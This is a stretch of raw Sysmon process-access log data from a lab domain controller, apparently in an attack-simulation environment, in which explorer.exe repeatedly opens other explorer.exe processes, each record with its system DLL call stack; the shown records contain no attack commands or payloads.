16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241310Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241309Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241308Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241307Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241306Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241305Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241304Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241303Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241302Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241301Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241300Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241299Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241298Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241297Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241296Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241295Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241294Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241293Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241292Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241291Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241290Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241289Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241288Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241287Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241286Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241285Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241284Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241283Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 